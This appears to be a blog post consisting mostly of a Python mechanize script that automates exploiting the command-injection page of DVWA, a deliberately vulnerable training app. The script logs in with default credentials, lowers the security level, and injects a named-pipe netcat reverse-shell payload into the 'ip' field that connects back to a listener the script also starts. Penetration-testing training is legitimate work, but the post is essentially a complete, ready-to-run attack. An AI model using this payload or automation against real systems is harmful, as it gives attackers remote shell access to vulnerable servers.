Automated OS Injection Reverse Shell with Mechanize Against DVWA

Damn Vulnerable Web Application (DVWA) is an intentionally vulnerable web application used for training. DVWA is also one of the web applications on the OWASP Broken Web Applications Virtual Machine. This post is nothing more than a script that automates the exploitation of the OS injection vulnerability using Python’s mechanize module for browser automation.

# Tested on Windows against DVWA within the OWASP Broken Web App VM Version 1.2

import mechanize  
import sys
import os

# Positional arguments, read unvalidated at import time: a missing argument
# raises IndexError, and the values are later spliced into URLs and shell
# command strings without any escaping or format checking.
rhost: str = sys.argv[1] #IP address of target DVWA application
lhost: str = sys.argv[2] #IP address of where you are catching the shell
lport: str = sys.argv[3] #Port where you want to catch the shell (kept as str)

def listener():
    """Opens a command prompt and starts a netcat listener.

    Windows-only: ``start cmd.exe /k`` spawns a new console window that
    stays open after ``nc`` exits.  ``lport`` is concatenated into the
    command string unquoted (it is already a ``str`` from ``sys.argv``, so
    ``str()`` is a no-op) and ``os.system`` hands the whole string to the
    shell, so whatever was given on the command line runs as-is.  Assumes
    ``nc`` is on PATH -- confirm on the host.  Returns nothing; the exit
    status of ``os.system`` is not checked, so a failed launch is silent.
    """
    os.system(r'start cmd.exe /k "nc -lvp" ' + str(lport))

def browse_and_exploit():
    """Logs into DVWA, sets security to low, and injects a payload.

    Drives one mechanize browser through three pages of the target DVWA
    instance in order: the login form (hard-coded default ``admin``/``admin``
    credentials), the security-level form, and the command-injection page.
    Every request is plain ``http://`` and no response is inspected, so a
    failed login, a changed form layout or a rejected submission is not
    reported here -- the only success signal is a connection arriving at
    the listener.

    Reads the module globals ``rhost``, ``lhost`` and ``lport`` (taken
    unvalidated from ``sys.argv``).  Relies on mechanize's default cookie
    handling to carry the login session into the later requests.
    """
    br = mechanize.Browser() # create a browser object

    br.open("http://" + rhost + '/dvwa/login.php') # navigate to DVWA (cleartext HTTP)
    br.select_form(nr=0) # select the first (and only) form
    br.form['username']='admin' # fill in the login page with DVWA's shipped default account
    br.form['password']='admin' 
    br.submit() #submit the form; the result is not checked

    br.open('http://' + rhost + '/dvwa/security.php') #opens the security page
    br.select_form(nr=0) #selects the form
    br.form['security'] = ["low"] # changes the security setting to low (presumably the level with no input filtering on the exec page -- confirm)
    br.submit()

    br.open('http://' + rhost + '/dvwa/vulnerabilities/exec/') #open command injection page
    br.select_form(nr=0) # select the form
 
    # Uses netcat on the target server to shovel a shell back to the listener
    # The 'ip' field is the injection point (the page presumably passes it to a
    # shell -- verify).  The value is %-formatted from lhost/lport, so those argv
    # strings land in the submitted command verbatim.
    br.form['ip']='google.com && rm -f /tmp/backpipe && mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc %s %s 1>/tmp/backpipe' % (lhost,lport) 
    br.submit() #submits the form and the shell should come; no response check

def main():
    """Start the local listener first, then drive the browser session.

    Order matters: the listener must be up before the injected command
    tries to connect back, so the two steps run strictly in sequence.
    """
    steps = (listener, browse_and_exploit)
    for step in steps:
        step()
 
# Script entry point; nothing runs on import except the sys.argv reads above.
if __name__ == '__main__':
    main()
